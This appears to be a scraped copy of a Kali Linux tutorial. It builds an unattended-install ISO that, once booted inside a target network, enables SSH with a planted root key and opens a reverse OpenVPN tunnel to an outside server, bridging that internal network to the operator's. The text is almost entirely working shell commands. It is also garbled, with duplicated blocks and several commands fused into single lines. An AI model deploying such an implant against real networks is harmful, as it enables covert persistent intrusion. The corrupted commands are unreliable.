We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that’s done, we’ll build The Kali Linux ISO of Doom on the same machine and make it available for download through HTTP
echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
mkdir /etc/openvpn/easy-rsa
cp /usr/share/easy-rsa/** /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa/
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
. ./vars
./clean-all
./build-ca
./build-key-server server
./build-key client
echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
mkdir /etc/openvpn/easy-rsa
cp /usr/share/easy-rsa/** /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa/
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
. ./vars
./clean-all
./build-ca
./build-key-server server
./build-key client
./build-dh
cp -rf keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
# Generate the OpenVPN server configuration file.
cd /etc/openvpn
echo tls-server > server.conf
echo port 443 >> server.conf
echo proto tcp >> server.conf
echo dev tap >> server.conf
echo ca ca.crt >> server.conf
echo cert server.crt >> server.conf
echo key server.key >> server.conf
echo dh dh2048.pem >> server.conf
echo server 10.8.0.0 255.255.255.0 >> server.conf
echo push “redirect-gateway def1 bypass-dhcp” >> server.conf
echo client-config-dir static >> server.conf
echo keepalive 10 120 >> server.conf
echo comp-lzo >> server.conf
echo user nobody >> server.conf
echo group nogroup >> server.conf
echo persist-key >> server.conf
echo persist-tun >> server.confecho status openvpn-status.log >> server.confecho verb 3 >> server.conf
# create client keys.
mkdir -p staticecho ifconfig-push 10.8.0.200 255.255.255.0 > static/clientcd ~
mkdir -p staticecho ifconfig-push 10.8.0.200 255.255.255.0 > static/clientcd ~
# start the OpenVPN server
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.
ssh-keygen
# Building the Kali Reverse VPN Agent ISO
apt-get update
apt-get install git live-build cdebootstrap curl -y
git clone git://git.kali.org/live-build-config.git build
cd build
echo 'update-rc.d -f ssh enable' >> kali-config/common/hooks/01-start-ssh.chroot
chmod +x kali-config/common/hooks/01-start-ssh.chroot
echo 'update-rc.d -f openvpn enable' >> kali-config/common/hooks/02-start-openvpn.chroot
chmod +x kali-config/common/hooks/02-start-openvpn.chroot
wget https://www.kali.org/dojo/unattended.txt -O kali-config/common/hooks/02-unattended-boot.binary
chmod +x kali-config/common/hooks/02-unattended-boot.binary
ssh-keygen
mkdir -p kali-config/common/includes.chroot/root/.ssh/
cp /root/.ssh/id_rsa.pub kali-config/common/includes.chroot/root/.ssh/authorized_keys
wget https://www.kali.org/dojo/preseed.cfg -O ./kali-config/common/includes.installer/preseed.cfg
echo openvpn >> kali-config/common/package-lists/kali.list.chroot
echo openssh-server >> kali-config/common/package-lists/kali.list.chroot
echo open-vm-tools >> kali-config/common/package-lists/kali.list.chroot
mkdir kali-config/common/includes.chroot/etc
mkdir kali-config/common/includes.chroot/etc/openvpn
cp /etc/openvpn/easy-rsa/keys/{ca.crt,client.crt,client.key} kali-config/common/includes.chroot/etc/openvpn/
cat << EOF > kali-config/common/includes.chroot/etc/openvpn/client.conf
client
dev tap
proto tcp
remote your_server_ip 443 # remote server IP
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
comp-lzo
verb 3
EOF
apt-get remove --purge libdebian-installer4 -y
wget http://ftp.debian.org/debian/pool/main/libd/libdebian-installer/libdebian-installer_0.99.tar.xz
tar xvf libdebian-installer_0.99.tar.xz
cd libdebian-installer-0.99
grep -R parser_rfc822 src
apt-get install automake libtool
autoreconf -i -v
./configure
make
make install
cd ~
lb config
lb build
mv binary.hybrid.iso /var/www/
service apache start
cd /etc/openvpn/
openvpn --config /etc/openvpn/server.conf
Now when you boot a system from the iso. The iso will start an unattended install and connects back over vpn after reboot.
Bridging the Network Gaps
Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.
# on the server
enable routing to the remote network on the OpenVPN server:
route add -net 192.168.101.0/24 gw 10.8.0.200
# on Kali Agent
We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:
echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
based on https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.
ssh-keygen
Bridging the Network Gaps
Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.
# on the server
route add -net 192.168.101.0/24 gw 10.8.0.200
# on Kali Agent
We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:
echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
based on https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/